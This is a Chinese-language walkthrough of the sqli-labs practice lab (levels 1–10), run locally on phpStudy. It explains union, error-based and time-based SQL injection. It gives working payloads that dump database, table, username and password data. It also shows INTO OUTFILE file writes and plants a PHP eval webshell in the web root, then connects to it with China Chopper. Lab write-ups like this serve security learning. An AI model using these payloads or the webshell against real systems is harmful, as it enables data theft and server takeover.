如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。
另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。
第一关
1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询
2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入
3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入
4.接着使用order by 语句判断,该表中一共有几列数据
order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。
5.将id=1改为一个数据库不存在的id值,如861,使用union select 1,2,3联合查询语句查看页面是否有显示位。
发现页面先输出了2和3,说明页面有2个显示位
6.然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息
例子:
http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
这是一个查询数据库名信息的语句
查询security内的所有表名
http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
接着使用下面的语句爆破出列名
select group_concat(column_name) from information_schema.columns where table_name='users'
接着使用如下语句查询所有的用户名,密码
lesect group_concat(password) from security.users
lesect group_concat(username) from security.users
第二关、
1.输入?id=2-1页面信息发生变化,说明此处是数值型注入
2.order by 3 页面显示正常,order by 4页面显示不正常,所以该表有3列数据
接着可以使用联合查询进行注入,详细过程参考第一关
第三关、
1.向页面输入?id=2' --+页面显示不正常,
但是输入 ?id=2') --+ 页面回显正常,说明此处是字符型注入,而且是以 ('')的方式闭合字符串的
2.接着使用order by 判断表中有3列数据
3.接着使用联合查询,union select 1,2,3 判断页面是否有显示位 答案:有
下面使用第一关所使用的查询语句,测试一下
页面显示没有问题
第四关、
与第三关类似,第四关使用 ("") 的方式闭合字符串,然后可以优先使用联合查询注入
1.当输入?id=3" --+时,页面显示不正常
2.当输入?id=3") --+
第五关、
1.经错测试发现,当输入?id=3时页面显示正常,具体如下
当输入?id=486页面显示如下
说明页面没有显示位。无法使用联合查询注入
2.接着我们尝试在URL中输入 ?id=2' 页面出现错误语句如下
页面出现SQL语句报错,在这里我们就可以使用一种新的注入方式:报错注入
首先介绍三种报错注入常用的语句:
(1). 通过floor报错
and (select 1 from (select count(*),concat((
payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
其中payload为你要插入的SQL语句
需要注意的是该语句将
输出字符长度限制为64个字符
(2). 通过updatexml报错
and updatexml(1,
payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效
(3). 通过ExtractValue报错
and extractvalue(1,
payload)
输出字符有长度限制,最长32位。
payload即我们要输入的sql查询语句
3.在这里我们使用floor报错语句进行注入
?id=2' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
这里发现页面提示我输出信息超过一行,但我们已经使用了group_concat函数,说明这里数据库名组成的字符串长度超过了64位,所以我们需要放弃group_concat函数,而使用limit 0,1来一个个输出
group_concat()函数的作用:将返回信息拼接成一行显示
limit 0,1 表示输出第一个数据。 0表示输出的起始位置,1表示跨度为1(即输出几个数据,1表示输出一个,2就表示输出两个)
接着我们运用如下语句:
and (select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
需要注意的是,
此时数据库名并不是 information_schema1
这个1是floor报错语句中输出的也一部分(无论输出什么结果,都会有这个1)
为了防止某些时候,我们误以为这个1也是我们查询结果的一部分,我建议大家使用一个;与它分开,语句如下:
?id=2' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
下面我们更该我们的payload一个个的查询我们要找的数据即可,这里不再演示
第六关、
与第5关类似,只不过这一关使用的是 ""的方式闭合字符串
我们只需要将?id=2' 改为 ?id=2"即可
其余过程不再赘述,请参考第五关
第七关、
想了一下,可能会有很多小白和我一样,对数据库file权限和 into outfile这个命令比较陌生,所以在这里科普一下file权限和into outfile这个函数。
数据库的file权限规定了数据库用户是否有权限向操作系统内写入和读取已存在的权限
into outfile命令使用的环境:
我们必须知道,服务器上一个可以写入文件的文件夹的完整路径
1.我们正常输入?id=1页面回显如下
2.当我们输入 and 1=2 页面显示依然正常,说明不是数值型注入
3.当我们输入?id=1'页面报错,说明可能存在"注入
4..当我们输入?id=1' --+页面显示依然不正常
5.接着我们尝试?id=1') --+,页面依然显示不正常,有点难受,不过没关系
6.我们可以接着输入?id=5')) --+尝试,发现页面回显正常
7. 由于本关卡提示我们使用file权限向服务器写入文件,我们就先尝试下写数据
由于我用的是phpstudy搭建的环境,所以我直接在我本机取一个目录就好
C:\phpStudy\PHPTutorial\MySQL\data
然后使用union select 1,2,3 into outfile "C:\phpStudy\PHPTutorial\MySQL\data\chao.php" 尝试写入文件。
然后去本机文件夹下查看文件是否写入成功。
写入成功了,但是文件名变成了如图红色表示的那样!!
接着我进行了好多次尝试,最后被同学告知,需要使用\\来代替目录中的\ ,具体原因我也不知道,后续会补上。 命令如下:
union select 1,2,3 into outfile "C:\\phpStudy\\PHPTutorial\\MySQL\\data\\chao.php"
文件导入成功!,接着我们查看chao.php的内容
需要注意的是利用数据库file权限向操作系统写入文件时,
对于相同文件名的文件不能覆盖,所以如果第一次上传chao.php,下次在上传chao.php,就是无效命令了,也就是新的chao,php中的内容并不会覆盖,之前的chao.php
我们再尝试上传一句话木马,具体命令
?id=-1')) union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\123456.php" --+
接着试着访问一下这个文件
上传成功,使用菜刀链接下
连接成功!!!!
第八关、
1.?id=2' --+ 页面回显正常,不赘述了,这里是单引号字符型注入
2.页面没有显示位,没有数据库报错信息。
我们先尝试一下是否有file权限
http://127.0.0.1/sqli-labs/Less-8/?id=2' union select 1,2,3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\88888.php"--+
上传成功
当然我尝试下了下布尔和时间盲注,都是可以的
第九关、
这里我们尝试使用单引号和双引号闭合,发现页面回显一直正常,说明该关卡可能将我们的单双引号给退意了。
但是我输入%df之后页面回显依然正常,这个时候我觉得应该是无论我输入什么页面回显都是一样的。所以我尝试使用sleep()函数来测试
经过多次尝试,这里是单引号闭合的时间注入
' and sleep(5)
第十关、
基于双引号的时间注入
?id=2" and sleep(5) --+
这里我就不在一个一个字母的去测试了,大家了解一下时间盲注就好